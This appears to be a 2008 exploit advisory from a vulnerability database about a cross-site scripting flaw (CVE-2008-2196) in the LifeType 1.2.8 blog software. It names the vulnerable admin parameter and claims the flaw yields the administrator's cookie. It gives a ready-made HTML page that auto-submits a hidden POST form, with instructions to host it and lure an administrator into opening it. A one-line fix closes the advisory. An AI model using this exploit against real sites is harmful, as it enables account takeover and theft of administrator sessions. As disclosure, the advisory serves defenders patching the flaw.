Bug: LifeType 1.2.8 XSS Vulnerability ( Ascii Version )

Search:
WLB2

LifeType 1.2.8 XSS Vulnerability

Published
Credit
Risk
2008.05.15
Khashayar Fereidani Or Dr.Crash
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2008-2196
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

----------------------------------------------------------------

Script : LifeType 1.2.8

Type : XSS Vulnerability

----------------------------------------------------------------

Discovered by : �Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH

----------------------------------------------------------------

Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM

----------------------------------------------------------------

IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr

----------------------------------------------------------------

Script Download : http://mesh.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.8.tar.b
z2

----------------------------------------------------------------

Type : Cross Site Scripting

Method Of Send : POST

File Name : http://Example/admin.php?op=editArticleCategories

Vulnerable Variable : newBlogUserName

Set "Add this user" Variable : "Add"

Set "op" Variable : "addBlogUser"

You Can Get Admin Cookie With This Vuln ....

----------------------------------------------------------------

Exploit :

Upload This Page And Send Link For Administrator .

________________________________

<html>

<head></head>

#Vulnerabily discovered by Khashayar Fereidani Or Dr.Crash

<body onLoad=javascript:document.form.submit()>

<form action="http://Example/lifetype/admin.php?op=editArticleCategories"

method="POST" name="form">

<input type="hidden" name="newBlogUserName" value="" [XSS CODE]">

<input type="hidden" name="Add this user" value="Add">

<input type="hidden" name="op" value="addBlogUser">

</form>

</body>

</html>

________________________________

----------------------------------------------------------------

Solution : Edit Source Code And Filter newBlogUserName Variable With htmlspecialchar() function .......

----------------------------------------------------------------

TNx : God......

Khashayar Fereidani Email : irancrash[at]gmail[dot]com

IRCRASH TEAM - Http://IRCRASH.COM/

----------------------------------------------------------------

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version